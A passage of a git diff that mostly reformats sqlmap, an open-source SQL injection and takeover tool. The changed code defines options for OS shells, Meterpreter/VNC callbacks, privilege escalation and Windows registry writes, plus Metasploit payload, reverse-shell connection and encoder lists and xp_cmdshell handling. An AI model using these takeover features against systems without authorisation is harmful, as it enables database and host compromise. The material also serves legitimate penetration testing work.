action="store_true", - help="Check existence of common tables") + help="Check existence of common tables") brute.add_option("--common-columns", dest="commonColumns", action="store_true", - help="Check existence of common columns") + help="Check existence of common columns") # User-defined function options - udf = OptionGroup(parser, "User-defined function injection", "These " - "options can be used to create custom user-defined " - "functions") + udf = OptionGroup(parser, "User-defined function injection", "These options can be used to create custom user-defined functions") udf.add_option("--udf-inject", dest="udfInject", action="store_true", help="Inject custom user-defined functions") @@ -526,167 +466,131 @@ def cmdLineParser(argv=None): help="Local path of the shared library") # File system options - filesystem = OptionGroup(parser, "File system access", "These options " - "can be used to access the back-end database " - "management system underlying file system") + filesystem = OptionGroup(parser, "File system access", "These options can be used to access the back-end database management system underlying file system") filesystem.add_option("--file-read", dest="rFile", - help="Read a file from the back-end DBMS " - "file system") + help="Read a file from the back-end DBMS file system") filesystem.add_option("--file-write", dest="wFile", - help="Write a local file on the back-end " - "DBMS file system") + help="Write a local file on the back-end DBMS file system") filesystem.add_option("--file-dest", dest="dFile", - help="Back-end DBMS absolute filepath to " - "write to") + help="Back-end DBMS absolute filepath to write to") # Takeover options - takeover = OptionGroup(parser, "Operating system access", "These " - "options can be used to access the back-end " - "database management system underlying " - "operating system") + takeover = OptionGroup(parser, "Operating system access", "These options can be used to access the back-end database management system underlying operating system") takeover.add_option("--os-cmd", dest="osCmd", help="Execute an operating system command") - takeover.add_option("--os-shell", dest="osShell", - action="store_true", - help="Prompt for an interactive operating " - "system shell") + takeover.add_option("--os-shell", dest="osShell", action="store_true", + help="Prompt for an interactive operating system shell") - takeover.add_option("--os-pwn", dest="osPwn", - action="store_true", - help="Prompt for an OOB shell, " - "Meterpreter or VNC") + takeover.add_option("--os-pwn", dest="osPwn", action="store_true", + help="Prompt for an OOB shell, Meterpreter or VNC") - takeover.add_option("--os-smbrelay", dest="osSmb", - action="store_true", - help="One click prompt for an OOB shell, " - "Meterpreter or VNC") + takeover.add_option("--os-smbrelay", dest="osSmb", action="store_true", + help="One click prompt for an OOB shell, Meterpreter or VNC") - takeover.add_option("--os-bof", dest="osBof", - action="store_true", + takeover.add_option("--os-bof", dest="osBof", action="store_true", help="Stored procedure buffer overflow " "exploitation") - takeover.add_option("--priv-esc", dest="privEsc", - action="store_true", + takeover.add_option("--priv-esc", dest="privEsc", action="store_true", help="Database process user privilege escalation") takeover.add_option("--msf-path", dest="msfPath", - help="Local path where Metasploit Framework " - "is installed") + help="Local path where Metasploit Framework is installed") takeover.add_option("--tmp-path", dest="tmpPath", - help="Remote absolute path of temporary files " - "directory") + help="Remote absolute path of temporary files directory") # Windows registry options - windows = OptionGroup(parser, "Windows registry access", "These " - "options can be used to access the back-end " - "database management system Windows " - "registry") + windows = OptionGroup(parser, "Windows registry access", "These options can be used to access the back-end database management system Windows registry") - windows.add_option("--reg-read", dest="regRead", - action="store_true", - help="Read a Windows registry key value") + windows.add_option("--reg-read", dest="regRead", action="store_true", + help="Read a Windows registry key value") - windows.add_option("--reg-add", dest="regAdd", - action="store_true", - help="Write a Windows registry key value data") + windows.add_option("--reg-add", dest="regAdd", action="store_true", + help="Write a Windows registry key value data") - windows.add_option("--reg-del", dest="regDel", - action="store_true", - help="Delete a Windows registry key value") + windows.add_option("--reg-del", dest="regDel", action="store_true", + help="Delete a Windows registry key value") windows.add_option("--reg-key", dest="regKey", - help="Windows registry key") + help="Windows registry key") windows.add_option("--reg-value", dest="regVal", - help="Windows registry key value") + help="Windows registry key value") windows.add_option("--reg-data", dest="regData", - help="Windows registry key value data") + help="Windows registry key value data") windows.add_option("--reg-type", dest="regType", - help="Windows registry key value type") + help="Windows registry key value type") # General options - general = OptionGroup(parser, "General", "These options can be used " - "to set some general working parameters") + general = OptionGroup(parser, "General", "These options can be used to set some general working parameters") general.add_option("-s", dest="sessionFile", - help="Load session from a stored (.sqlite) file") + help="Load session from a stored (.sqlite) file") general.add_option("-t", dest="trafficFile", - help="Log all HTTP traffic into a " - "textual file") + help="Log all HTTP traffic into a textual file") - general.add_option("--batch", dest="batch", - action="store_true", - help="Never ask for user input, use the default behavior") + general.add_option("--batch", dest="batch", action="store_true", + help="Never ask for user input, use the default behavior") general.add_option("--binary-fields", dest="binaryFields", - help="Result fields having binary values (e.g. \"digest\")") + help="Result fields having binary values (e.g. \"digest\")") - general.add_option("--check-internet", dest="checkInternet", - action="store_true", - help="Check Internet connection before assessing the target") + general.add_option("--check-internet", dest="checkInternet", action="store_true", + help="Check Internet connection before assessing the target") general.add_option("--crawl", dest="crawlDepth", type="int", - help="Crawl the website starting from the target URL") + help="Crawl the website starting from the target URL") general.add_option("--crawl-exclude", dest="crawlExclude", help="Regexp to exclude pages from crawling (e.g. \"logout\")") general.add_option("--csv-del", dest="csvDel", - help="Delimiting character used in CSV output " - "(default \"%s\")" % defaults.csvDel) + help="Delimiting character used in CSV output (default \"%s\")" % defaults.csvDel) general.add_option("--charset", dest="charset", help="Blind SQL injection charset (e.g. \"0123456789abcdef\")") general.add_option("--dump-format", dest="dumpFormat", - help="Format of dumped data (CSV (default), HTML or SQLITE)") + help="Format of dumped data (CSV (default), HTML or SQLITE)") general.add_option("--encoding", dest="encoding", - help="Character encoding used for data retrieval (e.g. GBK)") + help="Character encoding used for data retrieval (e.g. GBK)") - general.add_option("--eta", dest="eta", - action="store_true", - help="Display for each output the estimated time of arrival") + general.add_option("--eta", dest="eta", action="store_true", + help="Display for each output the estimated time of arrival") - general.add_option("--flush-session", dest="flushSession", - action="store_true", - help="Flush session files for current target") + general.add_option("--flush-session", dest="flushSession", action="store_true", + help="Flush session files for current target") - general.add_option("--forms", dest="forms", - action="store_true", - help="Parse and test forms on target URL") + general.add_option("--forms", dest="forms", action="store_true", + help="Parse and test forms on target URL") - general.add_option("--fresh-queries", dest="freshQueries", - action="store_true", - help="Ignore query results stored in session file") + general.add_option("--fresh-queries", dest="freshQueries", action="store_true", + help="Ignore query results stored in session file") general.add_option("--har", dest="harFile", help="Log all HTTP traffic into a HAR file") - general.add_option("--hex", dest="hexConvert", - action="store_true", - help="Use DBMS hex function(s) for data retrieval") + general.add_option("--hex", dest="hexConvert", action="store_true", + help="Use DBMS hex function(s) for data retrieval") - general.add_option("--output-dir", dest="outputDir", - action="store", - help="Custom output directory path") + general.add_option("--output-dir", dest="outputDir", action="store", + help="Custom output directory path") - general.add_option("--parse-errors", dest="parseErrors", - action="store_true", - help="Parse and display DBMS error messages from responses") + general.add_option("--parse-errors", dest="parseErrors", action="store_true", + help="Parse and display DBMS error messages from responses") general.add_option("--save", dest="saveConfig", - help="Save options to a configuration INI file") + help="Save options to a configuration INI file") general.add_option("--scope", dest="scope", help="Regexp to filter targets from provided proxy log") @@ -697,77 +601,65 @@ def cmdLineParser(argv=None): general.add_option("--test-skip", dest="testSkip", help="Skip tests by payloads and/or titles (e.g. BENCHMARK)") - general.add_option("--update", dest="updateAll", - action="store_true", - help="Update sqlmap") + general.add_option("--update", dest="updateAll", action="store_true", + help="Update sqlmap") # Miscellaneous options miscellaneous = OptionGroup(parser, "Miscellaneous") miscellaneous.add_option("-z", dest="mnemonics", - help="Use short mnemonics (e.g. \"flu,bat,ban,tec=EU\")") + help="Use short mnemonics (e.g. \"flu,bat,ban,tec=EU\")") miscellaneous.add_option("--alert", dest="alert", - help="Run host OS command(s) when SQL injection is found") + help="Run host OS command(s) when SQL injection is found") miscellaneous.add_option("--answers", dest="answers", - help="Set question answers (e.g. \"quit=N,follow=N\")") + help="Set question answers (e.g. \"quit=N,follow=N\")") miscellaneous.add_option("--beep", dest="beep", action="store_true", - help="Beep on question and/or when SQL injection is found") + help="Beep on question and/or when SQL injection is found") - miscellaneous.add_option("--cleanup", dest="cleanup", - action="store_true", - help="Clean up the DBMS from sqlmap specific " - "UDF and tables") + miscellaneous.add_option("--cleanup", dest="cleanup", action="store_true", + help="Clean up the DBMS from sqlmap specific UDF and tables") - miscellaneous.add_option("--dependencies", dest="dependencies", - action="store_true", - help="Check for missing (non-core) sqlmap dependencies") + miscellaneous.add_option("--dependencies", dest="dependencies", action="store_true", + help="Check for missing (non-core) sqlmap dependencies") - miscellaneous.add_option("--disable-coloring", dest="disableColoring", - action="store_true", - help="Disable console output coloring") + miscellaneous.add_option("--disable-coloring", dest="disableColoring", action="store_true", + help="Disable console output coloring") miscellaneous.add_option("--gpage", dest="googlePage", type="int", - help="Use Google dork results from specified page number") + help="Use Google dork results from specified page number") - miscellaneous.add_option("--identify-waf", dest="identifyWaf", - action="store_true", - help="Make a thorough testing for a WAF/IPS/IDS protection") + miscellaneous.add_option("--identify-waf", dest="identifyWaf", action="store_true", + help="Make a thorough testing for a WAF/IPS/IDS protection") - miscellaneous.add_option("--mobile", dest="mobile", - action="store_true", - help="Imitate smartphone through HTTP User-Agent header") + miscellaneous.add_option("--mobile", dest="mobile", action="store_true", + help="Imitate smartphone through HTTP User-Agent header") - miscellaneous.add_option("--offline", dest="offline", - action="store_true", - help="Work in offline mode (only use session data)") + miscellaneous.add_option("--offline", dest="offline", action="store_true", + help="Work in offline mode (only use session data)") - miscellaneous.add_option("--purge-output", dest="purgeOutput", - action="store_true", - help="Safely remove all content from output directory") + miscellaneous.add_option("--purge-output", dest="purgeOutput", action="store_true", + help="Safely remove all content from output directory") - miscellaneous.add_option("--skip-waf", dest="skipWaf", - action="store_true", - help="Skip heuristic detection of WAF/IPS/IDS protection") + miscellaneous.add_option("--skip-waf", dest="skipWaf", action="store_true", + help="Skip heuristic detection of WAF/IPS/IDS protection") - miscellaneous.add_option("--smart", dest="smart", - action="store_true", - help="Conduct thorough tests only if positive heuristic(s)") + miscellaneous.add_option("--smart", dest="smart", action="store_true", + help="Conduct thorough tests only if positive heuristic(s)") miscellaneous.add_option("--sqlmap-shell", dest="sqlmapShell", action="store_true", - help="Prompt for an interactive sqlmap shell") + help="Prompt for an interactive sqlmap shell") miscellaneous.add_option("--tmp-dir", dest="tmpDir", - help="Local directory for storing temporary files") + help="Local directory for storing temporary files") miscellaneous.add_option("--web-root", dest="webRoot", - help="Web server document root directory (e.g. \"/var/www\")") + help="Web server document root directory (e.g. \"/var/www\")") - miscellaneous.add_option("--wizard", dest="wizard", - action="store_true", - help="Simple wizard interface for beginner users") + miscellaneous.add_option("--wizard", dest="wizard", action="store_true", + help="Simple wizard interface for beginner users") # Hidden and/or experimental options parser.add_option("--dummy", dest="dummy", action="store_true", @@ -976,9 +868,7 @@ def _(self, *args): if args.dummy: args.url = args.url or DUMMY_URL - if not any((args.direct, args.url, args.logFile, args.bulkFile, args.googleDork, args.configFile, \ - args.requestFile, args.updateAll, args.smokeTest, args.liveTest, args.wizard, args.dependencies, \ - args.purgeOutput, args.sitemapUrl)): + if not any((args.direct, args.url, args.logFile, args.bulkFile, args.googleDork, args.configFile, args.requestFile, args.updateAll, args.smokeTest, args.liveTest, args.wizard, args.dependencies, args.purgeOutput, args.sitemapUrl)): errMsg = "missing a mandatory option (-d, -u, -l, -m, -r, -g, -c, -x, --wizard, --update, --purge-output or --dependencies), " errMsg += "use -h for basic or -hh for advanced help\n" parser.error(errMsg) diff --git a/lib/parse/headers.py b/lib/parse/headers.py index 58accf9a8b9..83cd7e89065 100644 --- a/lib/parse/headers.py +++ b/lib/parse/headers.py @@ -24,18 +24,16 @@ def headersParser(headers): if not kb.headerPaths: kb.headerPaths = { "microsoftsharepointteamservices": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "sharepoint.xml"), - "server": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "server.xml"), - "servlet-engine": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "servlet-engine.xml"), - "set-cookie": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "set-cookie.xml"), - "x-aspnet-version": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "x-aspnet-version.xml"), - "x-powered-by": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "x-powered-by.xml"), + "server": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "server.xml"), + "servlet-engine": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "servlet-engine.xml"), + "set-cookie": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "set-cookie.xml"), + "x-aspnet-version": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "x-aspnet-version.xml"), + "x-powered-by": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "x-powered-by.xml"), } for header in itertools.ifilter(lambda x: x in kb.headerPaths, headers): value = headers[header] xmlfile = kb.headerPaths[header] - handler = FingerprintHandler(value, kb.headersFp) - parseXmlFile(xmlfile, handler) parseXmlFile(paths.GENERIC_XML, handler) diff --git a/lib/request/basic.py b/lib/request/basic.py index d0d6d0bbb7c..14e461946ae 100644 --- a/lib/request/basic.py +++ b/lib/request/basic.py @@ -110,7 +110,9 @@ def title(self): kb.mergeCookies = readInput(message, default='Y', boolean=True) if kb.mergeCookies and kb.injection.place != PLACE.COOKIE: - _ = lambda x: re.sub(r"(?i)\b%s=[^%s]+" % (re.escape(getUnicode(cookie.name)), conf.cookieDel or DEFAULT_COOKIE_DELIMITER), ("%s=%s" % (getUnicode(cookie.name), getUnicode(cookie.value))).replace('\\', r'\\'), x) + def _(value): + return re.sub(r"(?i)\b%s=[^%s]+" % (re.escape(getUnicode(cookie.name)), conf.cookieDel or DEFAULT_COOKIE_DELIMITER), ("%s=%s" % (getUnicode(cookie.name), getUnicode(cookie.value))).replace('\\', r'\\'), value) + headers[HTTP_HEADER.COOKIE] = _(headers[HTTP_HEADER.COOKIE]) if PLACE.COOKIE in conf.parameters: @@ -161,7 +163,7 @@ def checkCharEncoding(encoding, warn=True): return encoding # Reference: http://www.destructor.de/charsets/index.htm - translate = {"windows-874": "iso-8859-11", "utf-8859-1": "utf8", "en_us": "utf8", "macintosh": "iso-8859-1", "euc_tw": "big5_tw", "th": "tis-620", "unicode": "utf8", "utc8": "utf8", "ebcdic": "ebcdic-cp-be", "iso-8859": "iso8859-1", "iso-8859-0": "iso8859-1", "ansi": "ascii", "gbk2312": "gbk", "windows-31j": "cp932", "en": "us"} + translate = {"windows-874": "iso-8859-11", "utf-8859-1": "utf8", "en_us": "utf8", "macintosh": "iso-8859-1", "euc_tw": "big5_tw", "th": "tis-620", "unicode": "utf8", "utc8": "utf8", "ebcdic": "ebcdic-cp-be", "iso-8859": "iso8859-1", "iso-8859-0": "iso8859-1", "ansi": "ascii", "gbk2312": "gbk", "windows-31j": "cp932", "en": "us"} for delimiter in (';', ',', '('): if delimiter in encoding: diff --git a/lib/request/connect.py b/lib/request/connect.py index 2825c18b4c7..e0ea2a5322d 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py @@ -187,8 +187,7 @@ def _connReadProxy(conn): if not kb.dnsMode and conn: headers = conn.info() - if headers and hasattr(headers, "getheader") and (headers.getheader(HTTP_HEADER.CONTENT_ENCODING, "").lower() in ("gzip", "deflate")\ - or "text" not in headers.getheader(HTTP_HEADER.CONTENT_TYPE, "").lower()): + if headers and hasattr(headers, "getheader") and (headers.getheader(HTTP_HEADER.CONTENT_ENCODING, "").lower() in ("gzip", "deflate") or "text" not in headers.getheader(HTTP_HEADER.CONTENT_TYPE, "").lower()): retVal = conn.read(MAX_CONNECTION_TOTAL_SIZE) if len(retVal) == MAX_CONNECTION_TOTAL_SIZE: warnMsg = "large compressed response detected. Disabling compression" @@ -241,27 +240,27 @@ def getPage(**kwargs): kb.requestCounter += 1 threadData.lastRequestUID = kb.requestCounter - url = kwargs.get("url", None) or conf.url - get = kwargs.get("get", None) - post = kwargs.get("post", None) - method = kwargs.get("method", None) - cookie = kwargs.get("cookie", None) - ua = kwargs.get("ua", None) or conf.agent - referer = kwargs.get("referer", None) or conf.referer - host = kwargs.get("host", None) or conf.host - direct_ = kwargs.get("direct", False) - multipart = kwargs.get("multipart", None) - silent = kwargs.get("silent", False) - raise404 = kwargs.get("raise404", True) - timeout = kwargs.get("timeout", None) or conf.timeout - auxHeaders = kwargs.get("auxHeaders", None) - response = kwargs.get("response", False) + url = kwargs.get("url", None) or conf.url + get = kwargs.get("get", None) + post = kwargs.get("post", None) + method = kwargs.get("method", None) + cookie = kwargs.get("cookie", None) + ua = kwargs.get("ua", None) or conf.agent + referer = kwargs.get("referer", None) or conf.referer + host = kwargs.get("host", None) or conf.host + direct_ = kwargs.get("direct", False) + multipart = kwargs.get("multipart", None) + silent = kwargs.get("silent", False) + raise404 = kwargs.get("raise404", True) + timeout = kwargs.get("timeout", None) or conf.timeout + auxHeaders = kwargs.get("auxHeaders", None) + response = kwargs.get("response", False) ignoreTimeout = kwargs.get("ignoreTimeout", False) or kb.ignoreTimeout or conf.ignoreTimeouts - refreshing = kwargs.get("refreshing", False) - retrying = kwargs.get("retrying", False) - crawling = kwargs.get("crawling", False) - checking = kwargs.get("checking", False) - skipRead = kwargs.get("skipRead", False) + refreshing = kwargs.get("refreshing", False) + retrying = kwargs.get("retrying", False) + crawling = kwargs.get("crawling", False) + checking = kwargs.get("checking", False) + skipRead = kwargs.get("skipRead", False) if multipart: post = multipart @@ -1040,7 +1039,7 @@ def _randomizeParameter(paramString, randomParameter): name = safeVariableNaming(name) elif name in keywords: name = "%s%s" % (name, EVALCODE_KEYWORD_SUFFIX) - value = urldecode(value, convall=True, spaceplus=(item==post and kb.postSpaceToPlus)) + value = urldecode(value, convall=True, spaceplus=(item == post and kb.postSpaceToPlus)) variables[name] = value if cookie: diff --git a/lib/request/httpshandler.py b/lib/request/httpshandler.py index bd8fe4b5122..cb41f5af0ff 100644 --- a/lib/request/httpshandler.py +++ b/lib/request/httpshandler.py @@ -48,7 +48,7 @@ def create_sock(): # Reference(s): https://docs.python.org/2/library/ssl.html#ssl.SSLContext # https://www.mnot.net/blog/2014/12/27/python_2_and_tls_sni - if re.search(r"\A[\d.]+\Z", self.host) is None and kb.tlsSNI.get(self.host) != False and hasattr(ssl, "SSLContext"): + if re.search(r"\A[\d.]+\Z", self.host) is None and kb.tlsSNI.get(self.host) is not False and hasattr(ssl, "SSLContext"): for protocol in filter(lambda _: _ >= ssl.PROTOCOL_TLSv1, _protocols): try: sock = create_sock() diff --git a/lib/request/inject.py b/lib/request/inject.py index 485b835c475..35b0ad91057 100644 --- a/lib/request/inject.py +++ b/lib/request/inject.py @@ -175,10 +175,7 @@ def _goInferenceProxy(expression, fromUser=False, batch=False, unpack=True, char # forge the SQL limiting the query output one entry at a time # NOTE: we assume that only queries that get data from a table # can return multiple entries - if fromUser and " FROM " in expression.upper() and ((Backend.getIdentifiedDbms() \ - not in FROM_DUMMY_TABLE) or (Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE and not \ - expression.upper().endswith(FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]))) \ - and not re.search(SQL_SCALAR_REGEX, expression, re.I): + if fromUser and " FROM " in expression.upper() and ((Backend.getIdentifiedDbms() not in FROM_DUMMY_TABLE) or (Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE and not expression.upper().endswith(FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]))) and not re.search(SQL_SCALAR_REGEX, expression, re.I): expression, limitCond, topLimit, startLimit, stopLimit = agent.limitCondition(expression) if limitCond: diff --git a/lib/request/templates.py b/lib/request/templates.py index cad883bfd12..ff8ac82fe35 100644 --- a/lib/request/templates.py +++ b/lib/request/templates.py @@ -19,4 +19,3 @@ def getPageTemplate(payload, place): retVal = kb.pageTemplates[(payload, place)] return retVal - diff --git a/lib/takeover/abstraction.py b/lib/takeover/abstraction.py index 5a50ea98640..eb653c9895b 100644 --- a/lib/takeover/abstraction.py +++ b/lib/takeover/abstraction.py @@ -172,9 +172,9 @@ def _initRunAs(self): inject.goStacked(expression) # TODO: add support for PostgreSQL - #elif Backend.isDbms(DBMS.PGSQL): - # expression = getSQLSnippet(DBMS.PGSQL, "configure_dblink", ENABLE="1") - # inject.goStacked(expression) + # elif Backend.isDbms(DBMS.PGSQL): + # expression = getSQLSnippet(DBMS.PGSQL, "configure_dblink", ENABLE="1") + # inject.goStacked(expression) def initEnv(self, mandatory=True, detailed=False, web=False, forceInit=False): self._initRunAs() diff --git a/lib/takeover/metasploit.py b/lib/takeover/metasploit.py index 5813ca3361b..fb26052f862 100644 --- a/lib/takeover/metasploit.py +++ b/lib/takeover/metasploit.py @@ -81,6 +81,7 @@ def _initVars(self): _ = normalizePath(os.path.join(_, "..")) if _ == old: break + self._msfCli = "%s & ruby %s" % (_, self._msfCli) self._msfConsole = "%s & ruby %s" % (_, self._msfConsole) self._msfEncode = "ruby %s" % self._msfEncode @@ -88,60 +89,60 @@ def _initVars(self): self._msfVenom = "%s & ruby %s" % (_, self._msfVenom) self._msfPayloadsList = { - "windows": { - 1: ("Meterpreter (default)", "windows/meterpreter"), - 2: ("Shell", "windows/shell"), - 3: ("VNC", "windows/vncinject"), - }, - "linux": { - 1: ("Shell (default)", "linux/x86/shell"), - 2: ("Meterpreter (beta)", "linux/x86/meterpreter"), - } - } + "windows": { + 1: ("Meterpreter (default)", "windows/meterpreter"), + 2: ("Shell", "windows/shell"), + 3: ("VNC", "windows/vncinject"), + }, + "linux": { + 1: ("Shell (default)", "linux/x86/shell"), + 2: ("Meterpreter (beta)", "linux/x86/meterpreter"), + } + } self._msfConnectionsList = { - "windows": { - 1: ("Reverse TCP: Connect back from the database host to this machine (default)", "reverse_tcp"), - 2: ("Reverse TCP: Try to connect back from the database host to this machine, on all ports between the specified and 65535", "reverse_tcp_allports"), - 3: ("Reverse HTTP: Connect back from the database host to this machine tunnelling traffic over HTTP", "reverse_http"), - 4: ("Reverse HTTPS: Connect back from the database host to this machine tunnelling traffic over HTTPS", "reverse_https"), - 5: ("Bind TCP: Listen on the database host for a connection", "bind_tcp"), - }, - "linux": { - 1: ("Reverse TCP: Connect back from the database host to this machine (default)", "reverse_tcp"), - 2: ("Bind TCP: Listen on the database host for a connection", "bind_tcp"), - } - } + "windows": { + 1: ("Reverse TCP: Connect back from the database host to this machine (default)", "reverse_tcp"), + 2: ("Reverse TCP: Try to connect back from the database host to this machine, on all ports between the specified and 65535", "reverse_tcp_allports"), + 3: ("Reverse HTTP: Connect back from the database host to this machine tunnelling traffic over HTTP", "reverse_http"), + 4: ("Reverse HTTPS: Connect back from the database host to this machine tunnelling traffic over HTTPS", "reverse_https"), + 5: ("Bind TCP: Listen on the database host for a connection", "bind_tcp"), + }, + "linux": { + 1: ("Reverse TCP: Connect back from the database host to this machine (default)", "reverse_tcp"), + 2: ("Bind TCP: Listen on the database host for a connection", "bind_tcp"), + } + } self._msfEncodersList = { - "windows": { - 1: ("No Encoder", "generic/none"), - 2: ("Alpha2 Alphanumeric Mixedcase Encoder", "x86/alpha_mixed"), - 3: ("Alpha2 Alphanumeric Uppercase Encoder", "x86/alpha_upper"), - 4: ("Avoid UTF8/tolower", "x86/avoid_utf8_tolower"), - 5: ("Call+4 Dword XOR Encoder", "x86/call4_dword_xor"), - 6: ("Single-byte XOR Countdown Encoder", "x86/countdown"), - 7: ("Variable-length Fnstenv/mov Dword XOR Encoder", "x86/fnstenv_mov"), - 8: ("Polymorphic Jump/Call XOR Additive Feedback Encoder", "x86/jmp_call_additive"), - 9: ("Non-Alpha Encoder", "x86/nonalpha"), - 10: ("Non-Upper Encoder", "x86/nonupper"), - 11: ("Polymorphic XOR Additive Feedback Encoder (default)", "x86/shikata_ga_nai"), - 12: ("Alpha2 Alphanumeric Unicode Mixedcase Encoder", "x86/unicode_mixed"), - 13: ("Alpha2 Alphanumeric Unicode Uppercase Encoder", "x86/unicode_upper"), - } - } + "windows": { + 1: ("No Encoder", "generic/none"), + 2: ("Alpha2 Alphanumeric Mixedcase Encoder", "x86/alpha_mixed"), + 3: ("Alpha2 Alphanumeric Uppercase Encoder", "x86/alpha_upper"), + 4: ("Avoid UTF8/tolower", "x86/avoid_utf8_tolower"), + 5: ("Call+4 Dword XOR Encoder", "x86/call4_dword_xor"), + 6: ("Single-byte XOR Countdown Encoder", "x86/countdown"), + 7: ("Variable-length Fnstenv/mov Dword XOR Encoder", "x86/fnstenv_mov"), + 8: ("Polymorphic Jump/Call XOR Additive Feedback Encoder", "x86/jmp_call_additive"), + 9: ("Non-Alpha Encoder", "x86/nonalpha"), + 10: ("Non-Upper Encoder", "x86/nonupper"), + 11: ("Polymorphic XOR Additive Feedback Encoder (default)", "x86/shikata_ga_nai"), + 12: ("Alpha2 Alphanumeric Unicode Mixedcase Encoder", "x86/unicode_mixed"), + 13: ("Alpha2 Alphanumeric Unicode Uppercase Encoder", "x86/unicode_upper"), + } + } self._msfSMBPortsList = { - "windows": { - 1: ("139/TCP", "139"), - 2: ("445/TCP (default)", "445"), - } - } + "windows": { + 1: ("139/TCP", "139"), + 2: ("445/TCP (default)", "445"), + } + } self._portData = { - "bind": "remote port number", - "reverse": "local port number", - } + "bind": "remote port number", + "reverse": "local port number", + } def _skeletonSelection(self, msg, lst=None, maxValue=1, default=1): if Backend.isOs(OS.WINDOWS): @@ -484,10 +485,13 @@ def _loadMetExtensions(self, proc, metSess): send_all(proc, "use espia\n") send_all(proc, "use incognito\n") - # This extension is loaded by default since Metasploit > 3.7 - #send_all(proc, "use priv\n") - # This extension freezes the connection on 64-bit systems - #send_all(proc, "use sniffer\n") + + # This extension is loaded by default since Metasploit > 3.7: + # send_all(proc, "use priv\n") + + # This extension freezes the connection on 64-bit systems: + # send_all(proc, "use sniffer\n") + send_all(proc, "sysinfo\n") send_all(proc, "getuid\n") diff --git a/lib/takeover/registry.py b/lib/takeover/registry.py index 043ed56bd2a..00b5183a7b2 100644 --- a/lib/takeover/registry.py +++ b/lib/takeover/registry.py @@ -33,19 +33,19 @@ def _initVars(self, regKey, regValue, regType=None, regData=None, parse=False): readParse = "REG QUERY \"" + self._regKey + "\" /v \"" + self._regValue + "\"" self._batRead = ( - "@ECHO OFF\r\n", - readParse, - ) + "@ECHO OFF\r\n", + readParse, + ) self._batAdd = ( - "@ECHO OFF\r\n", - "REG ADD \"%s\" /v \"%s\" /t %s /d %s /f" % (self._regKey, self._regValue, self._regType, self._regData), - ) + "@ECHO OFF\r\n", + "REG ADD \"%s\" /v \"%s\" /t %s /d %s /f" % (self._regKey, self._regValue, self._regType, self._regData), + ) self._batDel = ( - "@ECHO OFF\r\n", - "REG DELETE \"%s\" /v \"%s\" /f" % (self._regKey, self._regValue), - ) + "@ECHO OFF\r\n", + "REG DELETE \"%s\" /v \"%s\" /f" % (self._regKey, self._regValue), + ) def _createLocalBatchFile(self): self._batPathFp = open(self._batPathLocal, "w") diff --git a/lib/takeover/web.py b/lib/takeover/web.py index 617d67a5ad1..a907bc14905 100644 --- a/lib/takeover/web.py +++ b/lib/takeover/web.py @@ -112,10 +112,10 @@ def _webFileStreamUpload(self, stream, destFileName, directory): if self.webApi in getPublicTypeMembers(WEB_API, True): multipartParams = { - "upload": "1", - "file": stream, - "uploadDir": directory, - } + "upload": "1", + "file": stream, + "uploadDir": directory, + } if self.webApi == WEB_API.ASPX: multipartParams['__EVENTVALIDATION'] = kb.data.__EVENTVALIDATION diff --git a/lib/takeover/xp_cmdshell.py b/lib/takeover/xp_cmdshell.py index a9b17dd7701..bb99a7dc7e7 100644 --- a/lib/takeover/xp_cmdshell.py +++ b/lib/takeover/xp_cmdshell.py @@ -214,7 +214,7 @@ def xpCmdshellEvalCmd(self, cmd, first=None, last=None): if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: output = inject.getValue(query, resumeValue=False, blind=False, time=False) - if (output is None) or len(output)==0 or output[0] is None: + if (output is None) or len(output) == 0 or output[0] is None: output = [] count = inject.getValue("SELECT COUNT(id) FROM %s" % self.cmdTblName, resumeValue=False, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) diff --git a/lib/techniques/blind/inference.py b/lib/techniques/blind/inference.py index 61f92b6ef49..2783231f503 100644 --- a/lib/techniques/blind/inference.py +++ b/lib/techniques/blind/inference.py @@ -611,7 +611,7 @@ def blindThread(): # If we had no luck with commonValue and common charset, # use the returned other charset if not val: - val = getChar(index, otherCharset, otherCharset==asciiTbl) + val = getChar(index, otherCharset, otherCharset == asciiTbl) else: val = getChar(index, asciiTbl, not(charsetType is None and conf.charset)) diff --git a/lib/techniques/error/use.py b/lib/techniques/error/use.py index 769e0991a2c..cf84aa71347 100644 --- a/lib/techniques/error/use.py +++ b/lib/techniques/error/use.py @@ -133,20 +133,23 @@ def _oneShotErrorUse(expression, field=None, chunkTest=False): # Parse the returned page to get the exact error-based # SQL injection output - output = reduce(lambda x, y: x if x is not None else y, (\ - extractRegexResult(check, page), \ - extractRegexResult(check, threadData.lastHTTPError[2] if wasLastResponseHTTPError() else None), \ - extractRegexResult(check, listToStrValue((headers[header] for header in headers if header.lower() != HTTP_HEADER.URI.lower()) if headers else None)), \ - extractRegexResult(check, threadData.lastRedirectMsg[1] if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == threadData.lastRequestUID else None)), \ - None) + output = reduce(lambda x, y: x if x is not None else y, ( + extractRegexResult(check, page), + extractRegexResult(check, threadData.lastHTTPError[2] if wasLastResponseHTTPError() else None), + extractRegexResult(check, listToStrValue((headers[header] for header in headers if header.lower() != HTTP_HEADER.URI.lower()) if headers else None)), + extractRegexResult(check, threadData.lastRedirectMsg[1] if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == threadData.lastRequestUID else None)), + None + ) if output is not None: output = getUnicode(output) else: - trimmed = extractRegexResult(trimcheck, page) \ - or extractRegexResult(trimcheck, threadData.lastHTTPError[2] if wasLastResponseHTTPError() else None) \ - or extractRegexResult(trimcheck, listToStrValue((headers[header] for header in headers if header.lower() != 